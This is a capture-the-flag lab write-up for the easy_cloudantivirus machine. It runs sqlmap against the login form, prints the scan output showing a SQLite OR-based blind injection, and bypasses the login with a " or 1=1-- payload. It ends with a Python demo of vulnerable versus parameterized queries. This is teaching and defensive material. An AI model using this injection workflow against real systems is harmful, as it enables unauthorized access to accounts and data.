Target machine: easy_cloudantivirus (Part 2)
The form submits to /login, so the data it carries is presumably used for a login check, and the form fields are the obvious place to look for an injection point. We can test it with sqlmap:

- Create a file target.txt.
- In Kali's Firefox-ESR, open http://192.168.56.109:8080/ and press Ctrl + Shift + I to open the Web Developer Tools.
- In the Network tool, capture requests to http://192.168.56.109:8080/login.
- On http://192.168.56.109:8080/, submit the form so the POST request above is captured.
- Copy the captured request (request line, headers and body, i.e. the raw HTTP request that sqlmap's -r option expects) into target.txt.
- Run the command
sqlmap -r target.txt -f --level 4 --risk 3

Here -r reads the raw request from the file, -f fingerprints the back-end DBMS, and --level 4 --risk 3 enable the fuller payload set, including the OR-based tests. Note that risk 3 payloads can modify data if the injected statement turns out to be an UPDATE or DELETE, so keep that setting for lab targets like this one.
In the run below the request file was saved as testsql.txt; use whatever name you gave it.

```
┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
[sqlmap banner] {1.6.10#stable} https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:18:43 /2022-10-23/

[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
```

- From this output we can see that the password parameter is injectable and that the DBMS is most likely SQLite. The redirect to '/scan' that sqlmap noticed while sending the OR payloads is the post-login redirect, which is a good sign that the OR condition is making the login check pass.
- And from the line
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
we can see the injection type is OR boolean-based blind.
Constructing the injection: since the type is OR boolean-based, we can try the common payload " or 1=1-- as the password value in the form on http://192.168.56.109:8080/ and submit it. The leading quote closes the string literal the application wraps the password in, or 1=1 makes the WHERE clause true for every row, and -- comments out the remainder of the query, so the check passes no matter what password is stored.
At this point we are successfully logged in and land on
http://192.168.56.109:8080/scan
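As an added example (not code from the target or from the original write-up), here is a SQLite-backed login check in the shape sqlmap's finding implies, next to its parameterized fix. The table and column names, the stored secret and the handler shape are assumptions made for the example. The ' or 1=1-- form uses SQL's standard single-quote delimiter; the double-quote form from the page is shown too, because SQLite falls back to treating a double-quoted token that matches no column as a string literal (unless the library was built with SQLITE_DQS=0), which is why that payload works when the application wraps the value in double quotes.

```python
import sqlite3

# Added example: a SQLite login check in the vulnerable form (string
# concatenation) and the hardened form (bound parameters). Table name,
# column name and stored secret are assumptions, not taken from the target.


def build_db():
    """Constructed in-memory stand-in for the target's SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users (password) VALUES (?)", ("s3cret-invite-code",))
    conn.commit()
    return conn


def login_vulnerable(conn, password, quote="'"):
    """Splices the submitted password straight into the SQL text.

    `quote` is the delimiter the application wraps the value in. A payload
    that starts with that delimiter closes the literal early, `or 1=1` makes
    the WHERE clause true for every row, and `--` comments out the trailing
    delimiter. Returns True if any row matches, i.e. the login is accepted.
    """
    query = f"SELECT id FROM users WHERE password={quote}{password}{quote}"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        # A malformed payload only yields a failed login here.
        return False


def login_fixed(conn, password):
    """Same check with a bound parameter: the value never becomes SQL syntax."""
    row = conn.execute("SELECT id FROM users WHERE password = ?", (password,)).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = build_db()
    # Standard single-quote payload, then the double-quote form used against
    # the target. The second relies on SQLite's legacy double-quoted-string
    # fallback (disabled on builds compiled with SQLITE_DQS=0).
    for quote, payload in (("'", "' or 1=1--"), ('"', '" or 1=1--')):
        print(f"vulnerable (delimiter {quote}): {login_vulnerable(conn, payload, quote)}")
        print(f"fixed      (delimiter {quote}): {login_fixed(conn, payload)}")
    print("fixed, correct secret:", login_fixed(conn, "s3cret-invite-code"))
```

The fix is the usual one: pass the value as a bound parameter so the driver never lets it reach the SQL parser as syntax; the payload then simply fails to match any stored password.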